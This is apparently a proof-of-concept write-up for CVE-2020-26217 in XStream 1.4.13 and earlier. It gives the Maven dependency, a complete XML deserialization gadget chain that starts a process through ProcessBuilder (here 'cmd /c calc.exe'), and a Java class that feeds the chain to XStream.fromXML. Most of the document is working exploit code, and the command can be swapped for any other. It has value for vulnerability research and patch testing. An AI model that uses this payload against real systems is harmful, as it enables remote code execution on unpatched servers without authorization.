XStream can be used for Remote Code Execution
Xstream <= 1.4.13
pom.xml
<!-- https://mvnrepository.com/artifact/com.thoughtworks.xstream/xstream -->
<dependencies>
<dependency>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream</artifactId>
<version>1.4.13</version>
</dependency>
</dependencies>
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
<dataHandler>
<dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
<contentType>text/plain</contentType>
<is class='java.io.SequenceInputStream'>
<e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
<iterator class='javax.imageio.spi.FilterIterator'>
<iter class='java.util.ArrayList$Itr'>
<cursor>0</cursor>
<lastRet>-1</lastRet>
<expectedModCount>1</expectedModCount>
<outer-class>
<java.lang.ProcessBuilder>
<command>
<string>cmd</string>
<string>/c</string>
<string>calc.exe</string>
</command>
</java.lang.ProcessBuilder>
</outer-class>
</iter>
<filter class='javax.imageio.ImageIO$ContainsFilter'>
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>start</name>
</filter>
<next/>
</iterator>
<type>KEYS</type>
</e>
<in class='java.io.ByteArrayInputStream'>
<buf></buf>
<pos>0</pos>
<mark>0</mark>
<count>0</count>
</in>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<string>test</string>
</entry>
</map>CVE_2020_26217.java
import com.thoughtworks.xstream.XStream;
public class CVE_2020_26217 {
public static void main(String[] args) {
String xml_poc = "<map>\n" +
" <entry>\n" +
" <jdk.nashorn.internal.objects.NativeString>\n" +
" <flags>0</flags>\n" +
" <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n" +
" <dataHandler>\n" +
" <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>\n" +
" <contentType>text/plain</contentType>\n" +
" <is class='java.io.SequenceInputStream'>\n" +
" <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>\n" +
" <iterator class='javax.imageio.spi.FilterIterator'>\n" +
" <iter class='java.util.ArrayList$Itr'>\n" +
" <cursor>0</cursor>\n" +
" <lastRet>-1</lastRet>\n" +
" <expectedModCount>1</expectedModCount>\n" +
" <outer-class>\n" +
" <java.lang.ProcessBuilder>\n" +
" <command>\n" +
" <string>cmd</string>\n" +
" <string>/c</string>\n" +
" <string>calc.exe</string>\n" +
" </command>\n" +
" </java.lang.ProcessBuilder>\n" +
" </outer-class>\n" +
" </iter>\n" +
" <filter class='javax.imageio.ImageIO$ContainsFilter'>\n" +
" <method>\n" +
" <class>java.lang.ProcessBuilder</class>\n" +
" <name>start</name>\n" +
" <parameter-types/>\n" +
" </method>\n" +
" <name>start</name>\n" +
" </filter>\n" +
" <next/>\n" +
" </iterator>\n" +
" <type>KEYS</type>\n" +
" </e>\n" +
" <in class='java.io.ByteArrayInputStream'>\n" +
" <buf></buf>\n" +
" <pos>0</pos>\n" +
" <mark>0</mark>\n" +
" <count>0</count>\n" +
" </in>\n" +
" </is>\n" +
" <consumed>false</consumed>\n" +
" </dataSource>\n" +
" <transferFlavors/>\n" +
" </dataHandler>\n" +
" <dataLen>0</dataLen>\n" +
" </value>\n" +
" </jdk.nashorn.internal.objects.NativeString>\n" +
" <string>test</string>\n" +
" </entry>\n" +
"</map>";
XStream xstream = new XStream();
xstream.fromXML(xml_poc);
}
}Result:
